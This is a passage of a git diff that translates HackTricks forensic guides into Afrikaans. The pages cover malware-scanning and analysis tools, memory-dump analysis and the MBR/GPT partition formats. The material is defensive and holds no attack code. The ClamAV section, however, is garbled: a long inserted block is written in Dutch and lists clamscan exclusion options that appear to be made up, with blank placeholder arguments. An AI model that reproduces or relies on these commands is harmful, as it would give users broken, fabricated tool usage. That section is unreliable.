2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) - +Jy kan die instrument [**YaraGen**](https://github.com/Neo23x0/yarGen) gebruik om yara-reëls te genereer vanaf 'n binêre lêer. Kyk na hierdie tutoriale: [**Deel 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deel 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deel 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash - python3 yarGen.py --update - python3.exe yarGen.py --excludegood -m ../../mals/ +python3 yarGen.py --update +python3.exe yarGen.py --excludegood -m ../../mals/ ``` - ### ClamAV -#### Install +#### Installeer +```bash +sudo apt-get install clamav +``` + +#### Bijwerken van de virusdefinities + +```bash +sudo freshclam +``` + +#### Scannen van een bestand + +```bash +clamscan +``` + +#### Scannen van een map + +```bash +clamscan -r +``` + +#### Scannen van het hele systeem + +```bash +clamscan -r / +``` + +#### Rapport genereren van de scanresultaten + +```bash +clamscan -r --log=.log / +``` + +#### Quarantaine van geïnfecteerde bestanden + +```bash +clamscan -r --move= / +``` + +#### Verwijderen van geïnfecteerde bestanden + +```bash +clamscan -r --remove / +``` + +#### Uitsluiten van bestanden of mappen van de scan + +```bash +clamscan -r --exclude= / +``` + +#### Uitsluiten van specifieke bestandsextensies van de scan + +```bash +clamscan -r --exclude=".extensie" / +``` + +#### Uitsluiten van specifieke bestandstypen van de scan + +```bash +clamscan -r --exclude="type/bestand" / +``` + +#### Uitsluiten van specifieke bestandsgroottes van de scan + +```bash +clamscan -r --exclude=">grootte" / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan + +```bash +clamscan -r --exclude="kenmerk" / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies + +```bash +clamscan -r --exclude="regex:patroon" / +``` + +#### Uitsluiten van specifieke bestanden of mappen van de scan met behulp van een lijst + +```bash +clamscan -r --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandsextensies van de scan met behulp van een lijst + +```bash +clamscan -r --exclude=".extensie" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandstypen van de scan met behulp van een lijst + +```bash +clamscan -r --exclude="type/bestand" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van een lijst + +```bash +clamscan -r --exclude="kenmerk" --exclude-from= / +``` + +#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies in een lijst + +```bash +clamscan -r --exclude="regex:patroon" --exclude-from= / +``` ``` sudo apt-get install -y clamav ``` +#### Skandering -#### Scan +Om 'n malware-analise te begin, is dit belangrik om die betrokke stelsel te skandeer vir enige moontlike malware. Hier is 'n paar skanderingstegnieke wat gebruik kan word: +- **Antivirus-skandering**: Voer 'n volledige skandering uit met 'n betroubare antivirusprogram om enige bekende malware te identifiseer. +- **Rootkit-skandering**: Gebruik 'n spesialiteitstool om te soek na enige versteekte rootkits wat moontlik op die stelsel geïnstalleer kan wees. +- **Netwerkverkeersanalise**: Monitor die netwerkverkeer om enige verdagte aktiwiteit of ongewone patrone te identifiseer. +- **Bestandshashing**: Skep 'n hashtabel van alle lêers op die stelsel en vergelyk dit met 'n databasis van bekende skadelike lêers. +- **Geheue-analise**: Analiseer die stelsel se geheue vir enige verdagte prosesse of aktiwiteit. + +Dit is belangrik om 'n kombinasie van hierdie skanderingstegnieke te gebruik om 'n volledige prentjie van die stelsel se veiligheid te verkry. ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` - ### [Capa](https://github.com/mandiant/capa) -**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as: +**Capa** ontdek potensieel skadelike **vermoëns** in uitvoerbare lêers: PE, ELF, .NET. Dit sal dinge soos Att\&ck-taktieke of verdagte vermoëns soos die volgende vind: -* check for OutputDebugString error -* run as a service -* create process +* kontroleer vir OutputDebugString-fout +* hardloop as 'n diens +* skep proses -Get it int he [**Github repo**](https://github.com/mandiant/capa). +Kry dit in die [**Github-opberging**](https://github.com/mandiant/capa). ### IOCs -IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\ -To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. +IOC beteken Indicator Of Compromise. 'n IOC is 'n stel **voorwaardes wat** enige potensieel ongewenste sagteware of bevestigde **malware identifiseer**. Blou-spanne gebruik hierdie tipe definisie om hierdie soort skadelike lêers in hul stelsels en netwerke te **soek**.\ +Dit is baie nuttig om hierdie definisies te deel, want as malware in 'n rekenaar geïdentifiseer word en 'n IOC vir daardie malware geskep word, kan ander Blou-spanne dit gebruik om die malware vinniger te identifiseer. -A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. +'n Hulpmiddel om IOCs te skep of te wysig is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Jy kan gereedskap soos [**Redline**](https://www.fireeye.com/services/freeware/redline.html) gebruik om gedefinieerde IOCs in 'n toestel te **soek**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ -Detection is based on four detection methods: - +[**Loki**](https://github.com/Neo23x0/Loki) is 'n skandeerder vir Eenvoudige Indicators of Compromise.\ +Deteksie is gebaseer op vier deteksie-metodes: ``` 1. File Name IOC - Regex match on full file path/name +Regex match on full file path/name 2. Yara Rule Check - Yara signature matches on file data and process memory +Yara signature matches on file data and process memory 3. Hash Check - Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files - -4. C2 Back Connect Check - Compares process connection endpoints with C2 IOCs (new since version v.10) -``` +Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files +4. C2 Back Connect Check +Compares process connection endpoints with C2 IOCs (new since version v.10) +``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is 'n kwaadwillige skanderingstool vir Linux wat vrygestel is onder die GNU GPLv2-lisensie en ontwerp is vir die bedreigings wat in gedeelde gehoste omgewings voorkom. Dit maak gebruik van bedreigingsdata van netwerkrandindringingsdeteksiesisteme om aktief gebruikte kwaadware in aanvalle te onttrek en handtekeninge vir opsporing te genereer. Daarbenewens word bedreigingsdata ook afgelei van gebruikersinskrywings met die LMD-uitklooi-funksie en kwaadware-gemeenskapsbronne. ### rkhunter -Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware. - +Hulpmiddels soos [**rkhunter**](http://rkhunter.sourceforge.net) kan gebruik word om die lêersisteem vir moontlike **rootkits** en kwaadware te ondersoek. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` - ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques. +[**FLOSS**](https://github.com/mandiant/flare-floss) is 'n instrument wat sal probeer om versluierde strings binne uitvoerbare lêers te vind deur gebruik te maak van verskillende tegnieke. ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). +[PEpper](https://github.com/Th3Hurrican3/PEpper) kontroleer sekere basiese dinge binne die uitvoerbare lêer (binêre data, entropie, URL's en IP-adresse, sekere yara-reëls). ### PEstudio -[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques. +[PEstudio](https://www.winitor.com/download) is 'n instrument wat inligting oor Windows-uitvoerbare lêers kan verkry, soos invoer, uitvoer, koppe, maar dit sal ook virus totaal kontroleer en potensiële Att\&ck-tegnieke vind. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is 'n instrument om te bepaal of 'n lêer **versleutel** is en ook om **pakkers** te vind. ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) is 'n Python-skripsie wat verskeie **statistiese metodes** gebruik om **versluierde** en **versleutelde** inhoud binne teks-/skripslêers op te spoor. Die beoogde doel van NeoPI is om te help met die opsporing van verborge webshell-kode. ### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) doen sy uiterste bes om **versluierde**/**dodgy kode** asook lêers wat PHP-funksies gebruik wat dikwels in **malware**/webshells gebruik word, op te spoor. -### Apple Binary Signatures - -When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** +### Apple Binêre Handtekeninge +Wanneer jy 'n **malware monster** ondersoek, moet jy altyd die handtekening van die binêre lêer **ondersoek**, aangesien die **ontwikkelaar** wat dit onderteken het, moontlik al verband hou met **malware**. ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -166,31 +279,30 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` +## Opsoektegnieke -## Detection Techniques +### Lêerstapel -### File Stacking +As jy weet dat 'n sekere **gids wat die lêers van 'n webbediener bevat, laas op 'n sekere datum opgedateer is**, **kontroleer** die **datum** waarop al die **lêers** in die webbediener geskep en gewysig is, en as enige datum **verdag voorkom**, kontroleer daardie lêer. -If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. +### Basiese lyn -### Baselines +As die lêers van 'n gids **nie gewysig behoort te wees nie**, kan jy die **hak** van die **oorspronklike lêers** van die gids bereken en dit **vergelyk** met die **huidige** lêers. Enige iets wat gewysig is, sal **verdag voorkom**. -If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. +### Statistiese analise -### Statistical Analysis - -When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. +Wanneer die inligting in loglêers gestoor word, kan jy **statistieke soos hoeveel keer elke lêer van 'n webbediener as 'n webshell benader is**, nagaan.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 831a4438c..cfff56f5b 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -1,53 +1,53 @@ -# Memory dump analysis +# Geheue dump-analise
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Start +## Begin -Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). +Begin met **soek na malware** binne die pcap. Gebruik die **gereedskap** wat genoem word in [**Malware-analise**](../malware-analysis.md). ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. +**Volatility is die belangrikste oopbron-raamwerk vir geheue dump-analise**. Hierdie Python-gereedskap analiseer damps van eksterne bronne of VMware-VM's en identifiseer data soos prosesse en wagwoorde gebaseer op die dump se bedryfstelselprofiel. Dit is uitbreidbaar met plugins, wat dit baie veelsydig maak vir forensiese ondersoeke. -**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** +**[Vind hier 'n spiekbrief](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** -## Mini dump crash report +## Mini dump-ongelukverslag -When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump. +Wanneer die dump klein is (net 'n paar KB, dalk 'n paar MB), is dit waarskynlik 'n mini dump-ongelukverslag en nie 'n geheue-dump nie. ![](<../../../.gitbook/assets/image (216).png>) -If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: +As jy Visual Studio geïnstalleer het, kan jy hierdie lêer oopmaak en 'n paar basiese inligting soos prosesnaam, argitektuur, uitsonderingsinligting en uitgevoerde modules bind: ![](<../../../.gitbook/assets/image (217).png>) -You can also load the exception and see the decompiled instructions +Jy kan ook die uitsondering laai en die gedekompileerde instruksies sien ![](<../../../.gitbook/assets/image (219).png>) ![](<../../../.gitbook/assets/image (218) (1).png>) -Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump. +In elk geval is Visual Studio nie die beste gereedskap om 'n diepte-analise van die dump uit te voer nie. -You should **open** it using **IDA** or **Radare** to inspection it in **depth**. +Jy moet dit **oopmaak** met behulp van **IDA** of **Radare** om dit in **diepte** te ondersoek. @@ -55,18 +55,18 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth**
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index e05337c43..3818d8ea5 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -1,161 +1,158 @@ -# Partitions/File Systems/Carving +# Partisies/ Lêersisteme/ Uitsnyding -## Partitions/File Systems/Carving +## Partisies/ Lêersisteme/ Uitsnyding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Partitions +## Partisies -A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\ -The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size. +'n Harde skyf of 'n **SSD-skyf kan verskillende partisies bevat** met die doel om data fisies te skei.\ +Die **minimum** eenheid van 'n skyf is die **sektor** (gewoonlik saamgestel uit 512B). Dus moet elke partisie grootte 'n veelvoud van daardie grootte wees. -### MBR (master Boot Record) +### MBR (Master Boot Record) -It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\ -It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\ -MBR allows **max 2.2TB**. +Dit word toegewys in die **eerste sektor van die skyf na die 446B van die opstartkode**. Hierdie sektor is noodsaaklik om aan die rekenaar aan te dui wat en waarvandaan 'n partisie gemonteer moet word.\ +Dit laat tot **4 partisies** toe (slegs **1** kan aktief/ opstartbaar wees). As jy egter meer partisies nodig het, kan jy **uitgebreide partisies** gebruik. Die **laaste byte** van hierdie eerste sektor is die opstartrekord-handtekening **0x55AA**. Slegs een partisie kan as aktief gemerk word.\ +MBR laat **maksimum 2.2TB** toe. ![](<../../../.gitbook/assets/image (489).png>) ![](<../../../.gitbook/assets/image (490).png>) -From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. +Vanaf die **byte 440 tot 443** van die MBR kan jy die **Windows Disk Signature** vind (as Windows gebruik word). Die logiese aanduiding van die harde skyf hang af van die Windows Disk Signature. Die verandering van hierdie handtekening kan voorkom dat Windows opstart (hulpmiddel: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. ![](<../../../.gitbook/assets/image (493).png>) -**Format** +**Formaat** -| Offset | Length | Item | +| Offset | Lengte | Item | | ----------- | ---------- | ------------------- | -| 0 (0x00) | 446(0x1BE) | Boot code | -| 446 (0x1BE) | 16 (0x10) | First Partition | -| 462 (0x1CE) | 16 (0x10) | Second Partition | -| 478 (0x1DE) | 16 (0x10) | Third Partition | -| 494 (0x1EE) | 16 (0x10) | Fourth Partition | -| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA | +| 0 (0x00) | 446(0x1BE) | Opstartkode | +| 446 (0x1BE) | 16 (0x10) | Eerste Partisie | +| 462 (0x1CE) | 16 (0x10) | Tweede Partisie | +| 478 (0x1DE) | 16 (0x10) | Derde Partisie | +| 494 (0x1EE) | 16 (0x10) | Vierde Partisie | +| 510 (0x1FE) | 2 (0x2) | Handtekening 0x55 0xAA | -**Partition Record Format** +**Partisie Rekord Formaat** -| Offset | Length | Item | +| Offset | Lengte | Item | | --------- | -------- | ------------------------------------------------------ | -| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) | -| 1 (0x01) | 1 (0x01) | Start head | -| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) | -| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits | -| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) | -| 5 (0x05) | 1 (0x01) | End head | -| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) | -| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits | -| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) | -| 12 (0x0C) | 4 (0x04) | Sectors in partition | +| 0 (0x00) | 1 (0x01) | Aktiewe vlag (0x80 = opstartbaar) | +| 1 (0x01) | 1 (0x01) | Beginkop | +| 2 (0x02) | 1 (0x01) | Beginsektor (bits 0-5); boonste bits van silinder (6-7) | +| 3 (0x03) | 1 (0x01) | Begin silinder laagste 8 bits | +| 4 (0x04) | 1 (0x01) | Partisie tipe kode (0x83 = Linux) | +| 5 (0x05) | 1 (0x01) | Eindkop | +| 6 (0x06) | 1 (0x01) | Eindsektor (bits 0-5); boonste bits van silinder (6-7) | +| 7 (0x07) | 1 (0x01) | Eind silinder laagste 8 bits | +| 8 (0x08) | 4 (0x04) | Sektors voor partisie (little endian) | +| 12 (0x0C) | 4 (0x04) | Sektors in partisie | -In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) +Om 'n MBR in Linux te monteer, moet jy eers die beginverskuiwing kry (jy kan `fdisk` en die `p`-opdrag gebruik) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) - -And then use the following code +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) +En gebruik dan die volgende kode ```bash #Mount MBR in Linux mount -o ro,loop,offset= #63x512 = 32256Bytes mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ ``` +**LBA (Logiese blokadressering)** -**LBA (Logical block addressing)** +**Logiese blokadressering** (**LBA**) is 'n algemene skema wat gebruik word om die ligging van blokke data op rekenaarstoorapparate, gewoonlik sekondêre stoorstelsels soos harde skywe, te spesifiseer. LBA is 'n besonder eenvoudige lineêre adresseringstelsel; blokke word geïdentifiseer deur 'n heelgetalindeks, waar die eerste blok LBA 0 is, die tweede LBA 1, en so aan. -**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. +### GPT (GUID-partisietabel) -### GPT (GUID Partition Table) +Die GUID-partisietabel, bekend as GPT, word verkies vir sy verbeterde vermoëns in vergelyking met MBR (Meester Opstartrekord). Kenmerkend vir sy unieke identifiseerder vir partisies, steek GPT uit op verskeie maniere: -The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways: +- **Ligging en Grootte**: Beide GPT en MBR begin by **sektor 0**. Tog werk GPT met **64-bits**, teenoor MBR se 32-bits. +- **Partisiebeperkings**: GPT ondersteun tot **128 partisies** op Windows-stelsels en kan tot **9.4ZB** data akkommodeer. +- **Partisienames**: Bied die 